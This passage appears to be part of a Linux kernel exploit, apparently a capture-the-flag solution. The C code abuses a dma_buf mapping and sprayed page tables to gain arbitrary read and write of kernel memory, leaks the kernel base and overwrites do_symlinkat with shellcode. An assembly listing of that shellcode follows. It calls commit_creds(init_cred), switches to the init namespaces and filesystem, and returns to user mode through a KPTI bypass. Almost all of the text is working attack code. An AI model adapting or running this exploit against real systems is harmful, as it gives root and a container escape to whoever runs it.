    char *dma_buf = mmap((char*)spray_page[idx] + 7*0x1000, 0x1000, PROT_READ | PROT_WRITE,
                        MAP_POPULATE | MAP_SHARED, dma_buf_fd, 0);  //ATTATION NOT MAP_ANONYMOUS
    dma_buf[0] = 'a';
    printf("new page context:%s\n",(char*)spray_page[idx] + 7*0x1000);

    for (int i = 0; i < 0x1000; i++){
        // hexx("i",i);
        dup(victim_fd);  //增加引用次数，增量原语
    }

    puts("now,you can aar/aaw!");
    ((uint64_t*)dma_buf)[0]+=0x1000;

    puts("search the victim page_table 2");
    int idx2=0;
    for(int i=0;i<pagenum;i++){
        // hexx("i",i);
        if(*((char*)spray_page[i])!=('A')){
            puts("found!");
            idx2=i;
            hexx("idx2",idx2);
            break;
        }
    }
    printf("new page context:%s\n",(char*)spray_page[idx2]);
// p();
    puts("use dma_buf write addr,use file[idx2] read/write data");
    puts("leaking");
    ((uint64_t*)dma_buf)[0]=0x800000000009c067;
    uint64_t offset=(*((uint64_t*)spray_page[idx2]) & ~0xfff)-0x4a01000;
    hexx("offset",offset);

    puts("overwriting");
    //overwrite do_symlinkat
    ((uint64_t*)dma_buf)[0]=0x800000000142c067;   //0xc40
    char* start_addr=((char*)spray_page[idx2])+0xc40;

    char shellcode[] = {
        0xf3, 0x0f, 0x1e, 0xfa, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5f, 0x49, 0x81, 0xef, 0xc9,
        0xd4, 0x24, 0x00, 0x49, 0x8d, 0xbf, 0x00, 0x6b, 0xa7, 0x02, 0x49, 0x8d, 0x87, 0x70, 0x26,
        0x1c, 0x00, 0xff, 0xd0, 0xbf, 0x01, 0x00, 0x00, 0x00, 0x49, 0x8d, 0x87, 0xa0, 0x8f, 0x1b,
        0x00, 0xff, 0xd0, 0x48, 0x89, 0xc7, 0x49, 0x8d, 0xb7, 0xc0, 0x68, 0xa7, 0x02, 0x49, 0x8d,
        0x87, 0xd0, 0x0a, 0x1c, 0x00, 0xff, 0xd0, 0x49, 0x8d, 0xbf, 0x20, 0x53, 0xbb, 0x02, 0x49,
        0x8d, 0x87, 0xf0, 0xc0, 0x45, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc3, 0x48, 0xbf, 0x11, 0x11,
        0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x49, 0x8d, 0x87, 0xa0, 0x8f, 0x1b, 0x00, 0xff, 0xd0,
        0x48, 0x89, 0x98, 0x40, 0x07, 0x00, 0x00, 0x31, 0xc0, 0x48, 0x89, 0x04, 0x24, 0x48, 0x89,
        0x44, 0x24, 0x08, 0x48, 0xb8, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x48, 0x89,
        0x44, 0x24, 0x10, 0x48, 0xb8, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x48, 0x89,
        0x44, 0x24, 0x18, 0x48, 0xb8, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x48, 0x89,
        0x44, 0x24, 0x20, 0x48, 0xb8, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x48, 0x89,
        0x44, 0x24, 0x28, 0x48, 0xb8, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x48, 0x89,
        0x44, 0x24, 0x30, 0x49, 0x8d, 0x87, 0xc1, 0x11, 0x40, 0x01, 0xff, 0xe0, 0xcc };

    void *tmp;
    tmp = memmem(shellcode, sizeof(shellcode), "\x11\x11\x11\x11\x11\x11\x11\x11", 8);
    *(size_t*)tmp = getpid();
    tmp = memmem(shellcode, sizeof(shellcode), "\x22\x22\x22\x22\x22\x22\x22\x22", 8);
    *(size_t*)tmp = (size_t)&win;
    tmp = memmem(shellcode, sizeof(shellcode), "\x33\x33\x33\x33\x33\x33\x33\x33", 8);
    *(size_t*)tmp = user_cs;
    tmp = memmem(shellcode, sizeof(shellcode), "\x44\x44\x44\x44\x44\x44\x44\x44", 8);
    *(size_t*)tmp = user_rflags;
    tmp = memmem(shellcode, sizeof(shellcode), "\x55\x55\x55\x55\x55\x55\x55\x55", 8);
    *(size_t*)tmp = user_sp;
    tmp = memmem(shellcode, sizeof(shellcode), "\x66\x66\x66\x66\x66\x66\x66\x66", 8);
    *(size_t*)tmp = user_ss;
    memcpy(start_addr, shellcode, sizeof(shellcode));
    puts("[+] you got it");
    printf("%d\n", symlink("/jail/x", "/jail"));
    puts("[-] Fail");

// p();
}

Shellcode

  init_cred                                         equ 0x2a76b00
  commit_creds                              equ 0x01c2670
  find_task_by_vpid                        equ 0x01b8fa0
  init_nsproxy                                     equ 0x2a768c0
  switch_task_namespaces                 equ 0x01c0ad0
  init_fs                                                equ 0x2bb5320
  copy_fs_struct                                 equ 0x045c0f0
kpti_bypass                                        equ 0x14011c1

_start:
  endbr64
  call a
a:
  pop r15
  sub r15, 0x24d4c9

  ; commit_creds(init_cred) [3]
  lea rdi, [r15 + init_cred]
  lea rax, [r15 + commit_creds]
  call rax

  ; task = find_task_by_vpid(1) [4]
  mov edi, 1
  lea rax, [r15 + find_task_by_vpid]
  call rax

  ; switch_task_namespaces(task, init_nsproxy) [5]
  mov rdi, rax
  lea rsi, [r15 + init_nsproxy]
  lea rax, [r15 + switch_task_namespaces]
  call rax

  ; new_fs = copy_fs_struct(init_fs) [6]
  lea rdi, [r15 + init_fs]
  lea rax, [r15 + copy_fs_struct]
  call rax
  mov rbx, rax

  ; current = find_task_by_vpid(getpid())
  mov rdi, 0x1111111111111111   ; will be fixed at runtime
  lea rax, [r15 + find_task_by_vpid]
  call rax

  ; current->fs = new_fs [8]
  mov [rax + 0x740], rbx

  ; kpti trampoline [9]
  xor eax, eax
  mov [rsp+0x00], rax
  mov [rsp+0x08], rax
  mov rax, 0x2222222222222222   ; win
  mov [rsp+0x10], rax
  mov rax, 0x3333333333333333   ; cs
  mov [rsp+0x18], rax
  mov rax, 0x4444444444444444   ; rflags
  mov [rsp+0x20], rax
  mov rax, 0x5555555555555555   ; stack
  mov [rsp+0x28], rax
  mov rax, 0x6666666666666666   ; ss
  mov [rsp+0x30], rax
  lea rax, [r15 + kpti_bypass]
  jmp rax

  int3